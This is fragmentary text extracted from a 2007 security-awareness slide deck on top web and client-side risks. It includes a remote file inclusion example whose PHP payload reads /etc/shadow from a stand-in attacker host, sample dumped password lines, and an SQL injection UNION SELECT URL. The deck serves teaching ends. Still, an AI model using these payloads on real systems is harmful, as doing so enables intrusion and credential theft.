Академический Документы
Профессиональный Документы
Культура Документы
SECURITY
Top-10 2007 Security Risks
Jitender vig
Summary
Client-side Web Browsers
Email Clients
Vulnerabilities Media Players
Personnel
Instant Messaging
Application Abuse Peer-to-Peer Programs
Internet Firefox
Adobe
reader
Explorer Quicktime
Graphics
ActiveX HTML GDI function
Spoofing Memory Crafted
Help corruption URI
SetAbortProc
Email Clients
Microsoft Mozilla
Outlook Thunderbird
Phishing Denial of
Service
Distribution
of
Malware
Aims Bot-net
Server-Side Vulnerabilities
Client Server
Network
(Internet)
Vulnerabilities
Web Applications
Hacker www.mysite.com/index.php
$>wget www.mysite.com/ Index.php
USER:PASSWORD Vulnerabilities
root:S5AZl~]
Linus:@e)&#$*^%
Httpd:Jpzi5z@
www.badguy.ru/cat.php
cat.php
<?php
passthru("cat /etc/shadow");
?>
Database Software
http://localhost/admin.php?module=news&id= -
SQL Injection 1 union select 0,1,database(),3,4,5,6,7 from membres--
IM
Peer-to-Peer Programs
Zero Day Attacks
Conclusion
Internet security is hard because :